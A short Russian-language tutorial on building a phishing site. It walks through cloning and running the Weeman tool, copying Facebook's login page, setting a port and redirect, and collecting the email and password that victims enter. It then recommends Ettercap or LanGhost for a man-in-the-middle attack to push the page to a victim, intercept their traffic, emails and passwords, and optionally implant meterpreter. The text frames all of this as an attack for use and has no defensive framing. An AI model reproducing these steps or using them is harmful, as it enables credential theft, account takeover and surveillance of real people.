Как создать фишинговый сайт?

Установка

Сначала надо клонировать Weeman к себе на ПК:

git clone https://github.com/evait-security/weeman.git

Перейдем в директорию Weeman:

cd weeman

И запускаем weeman.py:

sudo python2 weeman.py

После запуска видим такую картину:

Начнем создание фишинг сайта. Сначала выберем нужный сайт. Например, https://www.facebook.com:

set url https://www.facebook.com

Выберем порт:

set port 8080

И напишем, куда после этого будет направлять пользователя:

set action_url https://www.facebook.com

И запуск:

run

Потом, если кто-то зайдет и введет свои данные, мы увидим примерно такую картину:

email => simple

pass => simple

Для того, чтобы подложить жертве этот сайт, мы можем воспользоваться приложением вроде Ettercap или LanGhost для совершения атаки посредника. Благодаря этому мы получим возможность перехватывать и анализировать его трафик и даже отправлять собственный трафик в его компьютер. Другими словами, из-за того, что он подключился к нашей точке доступа, мы получили полный контроль над всеми входящим и исходящим данными. Кроме этого, мы сможем перехватывать электронные письма и пароли к другим приложениям и сетям. При желании, мы даже можем внедрить в его систему meterpreter или другое приложение для прослушки, если хотим получить больше информации.